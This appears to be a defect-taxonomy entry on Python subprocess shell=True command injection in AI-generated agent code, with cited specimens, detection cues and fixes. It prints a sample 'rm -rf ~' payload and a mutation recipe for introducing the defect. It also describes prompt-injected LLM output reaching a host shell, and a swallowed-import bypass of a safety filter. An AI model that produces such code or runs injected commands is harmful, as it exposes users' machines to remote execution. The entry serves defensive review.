Shell=True Subprocess Injection¶
Code example¶
import subprocess
def fetch_dataset(url: str, dest_path: str) -> None:
cmd = f"wget -c {url} -O {dest_path}"
subprocess.run(cmd, shell=True, capture_output=False)
The function works for sanitized inputs. wget downloads url to dest_path. For trusted URLs and paths the function is correct.
The defect emerges when either url or dest_path contains shell metacharacters. With url = "http://x; rm -rf ~", the constructed shell string is wget -c http://x; rm -rf ~ -O ... — the shell parses the ; as a command separator and runs rm -rf ~ after the wget. The same applies to backticks, $(...), |, &&, ||, redirections, glob patterns, and many other shell metacharacters. Any string value reachable from external input becomes a remote-code-execution vector.
The tightened version uses argument-list form and shell=False (the default):
def fetch_dataset(url: str, dest_path: str) -> None:
subprocess.run(
["wget", "-c", url, "-O", str(dest_path)],
capture_output=False,
check=False,
)
The argument list is passed directly to the OS exec; no shell is involved; no metacharacters are interpreted. The function is now injection-proof for the values themselves (though the program being invoked — wget here — still needs to be trusted).
The pattern has several visible sub-shapes in captured specimens:
- shell=True + f-string interpolation — the dual surface to
string-built-sql.f"command {var}"passed tosubprocess.run(..., shell=True)produces a shell-injection point at each interpolated value. Captured in web3guru888/asi-build#1264 (f"wget -c {url} -O {dest_path}"withshell=True; ASI framework with 11KB CLAUDE.md). - LLM-output-direct-to-shell — the planning loop produces commands; commands run via
subprocess.run(shell=True). No sanitization, no allow-list, no sandboxing. The trust boundary is LLM output → host shell. If the LLM can be prompt-injected, the shell is the payload's target. Captured in peteromallet/megaplan (_run_user_command()inloop/engine.py— "General-purpose planning and execution harness for LLMs"). - Compound shell=True + swallowed-exception bypass of safety check. A safety module (
detect_dangerous_commandor similar) is supposed to gate command execution, but the safety-module import is wrapped inexcept ImportError: pass. If the import fails (missing dependency, environment issue), the safety check silently doesn't run and all commands execute unfiltered. Captured in NousResearch/hermes-agent (tui_gateway/server.py— 2 instances; Claude Code-generated audit). - shell=True + HTTP request parameter direct to shell. User-supplied command from HTTP request is passed straight to a shell with no validation. Captured in NousResearch/hermes-agent instance 2 (also in QuantGeekDev/docker-mcp's WindowsExecutor, supplementary).
All sub-shapes share the same root mechanism: subprocess.run(..., shell=True) with an interpolated string from any externally-reachable source.
Mechanism¶
A language model generates subprocess-invoking code from a local context that contains:
- A command to run (string template)
- Values to inject into the template
- A subprocess primitive (
subprocess.run,subprocess.Popen,os.system, etc.)
The training corpus contains both the safe form and the unsafe form:
-
Unsafe (corpus-dominant):
subprocess.run(cmd_string, shell=True). Reads naturally; matches how shells are documented in Stack Overflow answers ("just pass the command string"); one-line construction. -
Safe (corpus-recessive):
subprocess.run([prog, arg1, arg2], shell=False). The argument list form; requires breaking the command into components; less fluent to write inline.
The defective shape is over-represented per-token in three corpus segments:
"How do I run a shell command in Python" Stack Overflow answers. The asker's framing — "I have this shell command, how do I run it?" — naturally leads to answers like subprocess.run("cmd args ...", shell=True). The asker had a shell-syntax-formatted command in mind; the answer matches the framing. Security-conscious follow-ups exist in separate Q&A threads.
Tutorial code and beginner Python content. Subprocess tutorials commonly show shell=True because the example is demonstrating that subprocess can run shell commands. The shell-injection caveat is a separate paragraph or footnote that the model doesn't reliably attach to the surface form.
Quick scripts and one-liners. subprocess.run(f"ls {dir}", shell=True) is fluent; subprocess.run(["ls", dir]) is one character longer but breaks the chain. Token-level prediction favors the one-liner.
The model knows about shell=True risk in the abstract — it can explain SQL injection and command injection when asked directly. What it does not do reliably during local generation is select the argument-list form when producing a subprocess call. The corpus's shell-syntax-fluent form wins at the per-token decision point.
The pattern interacts with the prompt-injection-induced defect class observation captured in string-built-sql: AI coding tools can be steered toward unsafe-subprocess code via adversarial "coding standards" the same way they can be steered toward unsafe SQL. The defense-in-depth argument applies to both surfaces.
The defect path is direct shell-command-injection at any externally-reachable subprocess call. Concrete attack scenarios from the captured specimens:
- hermes-agent (instance 1): user-config-supplied
quick_commandsexecute withshell=True; any user who edits the config can inject shell commands. - hermes-agent (instance 2): HTTP request param flows directly to
shell=True; remote attacker can execute arbitrary commands. - megaplan: LLM-output-direct-to-shell; prompt-injected LLM output becomes shell-injection payload.
- asi-build: dataset config URL interpolated into shell string; future trust-boundary movement (community-supplied URLs) makes the latent defect active.
This pattern is AI-amplified, not AI-exclusive. Human Python programmers write shell=True constantly, particularly in scripts. The AI-amplified differential rests on:
- Agent-tool-surface concentration: AI-generated agent systems produce
shell=Trueat the most user-facing surface (TUI gateways, HTTP request handlers, LLM-output-handling). The defect's blast radius is largest exactly where AI produces it most. - LLM-output-trust-chain: AI tooling that runs LLM-generated commands extends the trust chain through the LLM. Prompt-injection of the LLM becomes shell-injection of the host. Human developers don't have an analogous trust-chain failure mode at this scale.
- Compound shape with swallowed-exceptions: the hermes-agent instance 2 shows safety checks bypassed via
except ImportError: pass. The compound defect is more AI-typical than either component alone — AI generates both broad excepts and shell=True; the combination produces a silent safety-check bypass. - Codified-guidance-is-insufficient at multiple layers: Bandit B602 (subprocess_popen_with_shell_equals_true), B604 (any_other_function_with_shell_equals_true), B605 (start_process_with_a_shell), OWASP Command Injection guidance — all are codified. AI-generated code reproduces the pattern despite all the rule-coverage.
Evidence / incident¶
Three captured specimens, each from a different AI-tooling Python project. Detailed specimen notes are not included in the public repository.
- NousResearch/hermes-agent — 2 instances of
subprocess.run(..., shell=True)intui_gateway/server.py(lines 2308 and 3131). Instance 1: user config commands. Instance 2: HTTP request commands with safety check bypassed byexcept ImportError: pass(compound shape with swallowed-exceptions). Critical severity. Claude Code-generated audit (signed🤖 Generated with Claude Code). AGENTS.md 51529 bytes (one of the largest in the taxonomy's evidence base). Hermes-agent has now contributed specimens to 6+ taxonomy entries. - peteromallet/megaplan —
_run_user_command()inloop/engine.py:104-107, 246-249passes LLM output directly tosubprocess.run(..., shell=True)with no sanitization or sandboxing. Project description: "General-purpose planning and execution harness for LLMs." The defect surface is the framework's central function. - web3guru888/asi-build#1264 —
subprocess.run(f"wget -c {url} -O {dest_path}", shell=True)indownload_datasets.py:55-56. Composite shape:shell=True+ f-string + url interpolation. "Unified ASI framework" with CLAUDE.md (11511 bytes). The audit explicitly raises the trust-boundary-drift argument: "Dataset registries tend to grow over time, and the trust boundary moves."
Three different sub-shapes (compound shell=True + swallowed-exception bypass / LLM-output-direct-to-shell / shell=True + f-string composite), three different audit framings (Claude Code-generated / community code-audit / community contributor B602 reference), three different AI-tooling project domains (TUI agent gateway / LLM planning harness / ASI framework).
Supplementary references:
- QuantGeekDev/docker-mcp#19 — "Security: Command injection via shell=True in WindowsExecutor" — docker MCP server with shell=True at the executor surface. Same root mechanism in MCP-server deployment context.
- Heldinhow/workflow-dev — "ShellTool uses shell=True - command injection risk" filed in March 2026. Workflow framework's ShellTool — the framework's primary tool is the defect.
- chaoss/CollectOSS — "shell=True could lead to injection in Facade Worker" (2026-04-30). Adjacent specimen in OSS-collection tooling.
Bandit has rules B602 (subprocess_popen_with_shell_equals_true), B604 (any_other_function_with_shell_equals_true), and B605 (start_process_with_a_shell). OWASP Command Injection guidance is widely cited. CWE-78 (OS Command Injection). The AI-amplified observation is the concentration at AI-tooling user-facing surfaces.
Detection cues¶
What to look for in a diff or completion:
subprocess.run(cmd, shell=True, ...)/subprocess.Popen(cmd, shell=True, ...)wherecmdis anything other than a fully-internal hardcoded constant. The most direct signal. Particularly suspect whencmdis an f-string, a.format()result, or a+-concatenated string.os.system(cmd)/os.popen(cmd)— older API surfaces that always invoke a shell. Same defect class.subprocess.run("cmd " + var, ...)/subprocess.run(f"cmd {var}", ...)even whenshell=Trueis omitted. If the first argument is a single string (not a list) andshell=Trueis not explicit, the behavior depends on the OS — but the intent is shell-syntax and the safety analysis should treat it asshell=True.- LLM-output-direct-to-subprocess — code that takes a string from an LLM response and passes it to subprocess. The trust chain is LLM → subprocess; the LLM is attackable; the subprocess is the payload's target.
- Agent tool functions that accept commands from external sources (HTTP, WebSocket, user config, request params). The trust boundary is the agent's input surface; subprocess on that surface should always use argument-list form.
- Safety-check imports wrapped in
try: import safety; except ImportError: pass. If the safety module governs subprocess execution, the bypass makes the safety check optional. This is the compound shape with swallowed-exceptions captured in the hermes-agent specimen. - Bandit
# noqa: B602/# noqa: B604/# noqa: B605annotations without justifying comments. The lint rule has been silenced; verify whether the suppression is principled or reflexive.
The diagnostic question for any subprocess call: can any value flowing into the command string ever be attacker-controlled? If yes, use argument-list form. If no — verify by tracing the data flow — even then prefer argument-list as a future-proofing measure against trust-boundary drift.
Bandit B602, B604, B605 catch the pattern mechanically. Adding them to CI is the structural cure. The argument-list form is virtually never wrong when it's a viable alternative.
Notes¶
Category security. Together with string-built-sql and tarfile-extractall-without-filter, the category spans the three most common AI-amplified security surfaces: SQL injection, command injection, path-traversal-via-archive-extraction.
Difficulty rated low. Spotting shell=True is visually trivial. Bandit B602 catches it mechanically. The reason this is in the taxonomy is AI-tool-surface concentration (the defect lands where AI tooling is most user-facing) and the LLM-output-trust-chain observation (a new defect class introduced by AI agent systems).
The pattern is AI-amplified, not AI-exclusive. Restated: every Python developer who has written subprocess code has used shell=True at some point. The AI-amplified differential rests on agent-tool-surface concentration, LLM-output-trust-chain, compound-shape with swallowed-exceptions, and codified-guidance-insufficient at multiple layers.
False-positive shapes. Be cautious before flagging:
- Hardcoded internal commands.
subprocess.run("ls -la", shell=True)with no variables and no external input is safe in the narrow sense. Even here the argument-list form is preferred for clarity, but it isn't a security defect. - Genuinely-needed shell features. Some commands require pipes, redirections, glob expansion, or environment-variable substitution. The argument-list form can't express these. The cure is either (a) using
shlex.quote()on user-controlled values before interpolation, (b) implementing the shell features in Python (pathlib's glob, file-open redirections), or (c) accepting the risk with documented allow-list validation. The cue is whether the audit can identify why shell is required. - Subprocess with allow-list-validated values. If the value going into the shell string has been validated against a tight allow-list (e.g.,
if cmd not in {"ls", "ps", "df"}: raise), the injection vector is constrained. The argument-list form is still preferred but the security defect is reduced. - Test code intentionally testing shell behavior. Tests that exercise shell escaping deliberately may use
shell=True. The cue is whether the test is testing shell escaping or just using a shell. - Migration code from a shell-script-based prior implementation. If the project is incrementally migrating a shell script into Python and the subprocess call is the legacy boundary,
shell=Truemay be transitional. The cue is whether the migration is documented and the transition is being completed.
Mutation operator hint. A deterministic mutation that introduces the pattern from clean code:
- Take
subprocess.run([prog, arg1, arg2])and replace withsubprocess.run(f"{prog} {arg1} {arg2}", shell=True) - Take
subprocess.run([cmd], shell=False)and addshell=True - Replace argument-list form with
os.system(cmd_string) - Take a safety-module-gated subprocess and wrap the safety-module import in
try: import safety; except ImportError: pass(compound with swallowed-exceptions)
These compose with string-built-sql (same root mechanism applied to SQL vs shell), swallowed-exceptions (the compound bypass shape captured in hermes-agent), and hardcoded-config-values (when the shell command target is hardcoded but the arguments are interpolated, the configuration is half-secure).
Connection to codified-guidance-is-insufficient note. Bandit B602/B604/B605 + OWASP guidance + CWE-78 + project-level CLAUDE.md / AGENTS.md (in hermes-agent, asi-build, etc.) — all are codified, well-known, widely-cited. AI-generated codebases reproduce the pattern despite all four layers. The compound shape (shell=True + swallowed-exception bypass) demonstrates how AI-typical defects compose to defeat even intended safety checks.
Connection to LLM-output-trust-chain observation. The megaplan specimen captures a defect class that didn't exist before AI agent frameworks: AI-generated commands executed on a host. The trust chain is user → planner → LLM → subprocess. Prompt injection of the LLM (via task description, retrieved context, tool result, or attacker-supplied input anywhere upstream) becomes shell injection of the host. This is structurally similar to the prompt-injection-induced sub-shape in string-built-sql (Aider's case) but with a more direct attack path — the LLM doesn't need to modify project code; it just needs to produce a command.
Connection to deployment-context-blind defects cluster. This entry joins seven prior entries in the cluster of defects whose blast radius is largest in production deployment contexts. Specifically, this entry's deployment context is receives-external-command-input — which AI agent frameworks routinely have at their TUI / HTTP / LLM-tool surfaces.
The compound shape is a methodologically new observation. The hermes-agent specimen captures three taxonomy entries' worth of mechanism in one defect path:
shell=True— the primary injection vectorexcept ImportError: passon safety-module import — swallowed-exceptions- The safety module exists and is intended; the defective import + suppression makes it not run — codified-guidance-defeated-by-its-own-implementation
This compound shape is methodologically richer than any single-pattern defect. AI-typical defects compose — combining mechanisms produces qualitatively more severe outcomes than any individual mechanism alone.